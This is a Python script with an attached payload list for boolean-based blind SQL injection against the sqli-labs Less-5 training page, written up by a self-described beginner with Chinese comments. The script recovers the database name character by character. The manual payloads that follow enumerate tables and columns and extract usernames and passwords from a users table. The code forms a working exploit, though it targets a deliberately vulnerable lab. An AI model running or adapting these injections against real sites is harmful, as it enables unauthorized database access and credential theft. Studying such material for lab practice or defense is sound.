import requests
import os
#此函數先判斷數據庫長度
def length(url,str):
    """Find the length of the current database name by boolean-based blind probing.

    Args:
        url: base request URL; the payload is string-appended to it, so the
            injectable parameter has to be the last thing in ``url``.
        str: marker text whose presence in the response body means the
            injected condition held (note: shadows the builtin ``str``).

    Side effects: one GET request per candidate length, counting up from 1
    with no upper bound, then hands the found length to ``content``.
    Returns nothing.

    NOTE(review): the original paste had lost its indentation; the layout
    below is the reconstruction that makes the loop terminate on a hit.
    """
    num = 1
    while True:
        str_num = '%d' %num
        # Boolean-blind probe: the page body only differs by whether
        # length(database()) equals the candidate, so the marker is the signal.
        len_url = url + "' and (select length(database()) = " + str_num +")--+"
        response = requests.get(len_url)
        if str in response.text:
            print("數據庫長度為:%s" %str_num)
            content(url,str,num)
            break
        else:
            # No ceiling: if the marker never appears (wrong URL, filtered
            # request, non-vulnerable target) this loops forever. The
            # monotonically increasing "= 1", "= 2", ... probes are also a
            # distinctive sequence in server access logs.
            num = num + 1
#此函數判斷字符串具體的內容
def content(url,str,num):
    """Recover the database name one character at a time, once its length is known.

    Args:
        url: base request URL (payload string-appended, as in ``length``).
        str: marker text indicating a true condition in the response.
        num: the name's length as found by ``length``; positions 1..num are probed.

    Side effects: len(s) GET requests per position; each matching character is
    appended to cache.txt through ``fwrite``. Returns nothing.

    NOTE(review): the original paste had lost its indentation; the position
    counter is placed at the ``while`` level below, which is the only layout
    under which every position is visited exactly once.
    """
    # Candidate alphabet: digits and lowercase ASCII only. The prose at the end
    # of this page notes that it has to be extended for other character sets.
    s = ['1','2','3','4','5','6','7','8','9','0','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']
    con_num = 1
    while con_num <= num:
        str_num = '%d' %con_num
        for i in s:
            # Probes whether character ``con_num`` of the name equals ``i``.
            con_url = url + "' and (select mid(database(),"+ str_num +",1)='"+ i +"')--+"
            response = requests.get(con_url)
            if str in response.text:
                fwrite(i)
            # No break after a hit: the sweep always runs the whole alphabet,
            # so each position costs len(s) near-identical requests — an
            # easy pattern to flag from the defender's side.
        con_num = con_num + 1
#此函數對字符串的內容做記錄並輸出
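def fwrite(i, path="cache.txt"):
    """Append *i* to a text file, by default ``cache.txt`` in the working directory.

    Args:
        i: text to append; the callers on this page pass one character.
        path: file to append to. Added as a keyword with the original
            hard-coded name as its default, so existing callers are unchanged.

    Returns nothing. The file is opened with ``with`` so the handle is
    released even if the write raises; the original closed it only on the
    success path, leaking the descriptor on error.
    """
    with open(path, 'a') as fp:
        fp.write(i)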
if __name__ == '__main__':
    # Hard-coded target: the sqli-labs Less-5 page on localhost, a deliberately
    # vulnerable training application.
    url = "http://localhost/sqli-labs/Less-5/?id=1"
    response = requests.get(url)
    # Marker text the lab page prints when its query succeeds; its presence or
    # absence is the only signal the blind probes above use. Shadows builtin str.
    str = "You are in..........."
    if str in response.text:
        length(url,str)
    else:
        # Marker absent on the plain request: the URL is wrong or the page
        # does not behave like the lab, so no probing is started.
        print("請輸入正確的地址")
初學python,只注重實現功能,不要太在意某些細節,如有建議,感謝提出。
#庫中有幾個表:
1' and ((select count(table_name) from information_schema.tables where table_schema = 'security') = 4)--+
#測表名長度:
1' and (select length((select table_name from information_schema.tables where table_schema = 'security' limit 0,1)) = 10)--+
#爆表名:
1' and (select mid((select table_name from information_schema.tables where table_schema = 'security' limit 0,1),1,1)='a')--+
#表中有幾列:
1' and ((select count(column_name) from information_schema.columns where table_name = 'users' and table_schema = 'security') = 3)--+
#測列名長度:
1' and (select length((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 1,1)) = 8)--+
#爆列名:
1' and (select mid((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 1,1),1,1)='u')--+
#爆用戶名:
1' and (select mid((select username from security.users limit 0,1),1,1)='d')--+
#爆密碼:
1' and (select mid((select password from security.users limit 0,1),1,1)='d')--+
以上標紅的就是需要遞歸測試的地方(標紅的地方不顯示-.-!,將就看),需要者可自行修改代碼。還有上述代碼中 s 列表請針對具體的情況修改,因為沒有特殊字符以及大寫字母等。
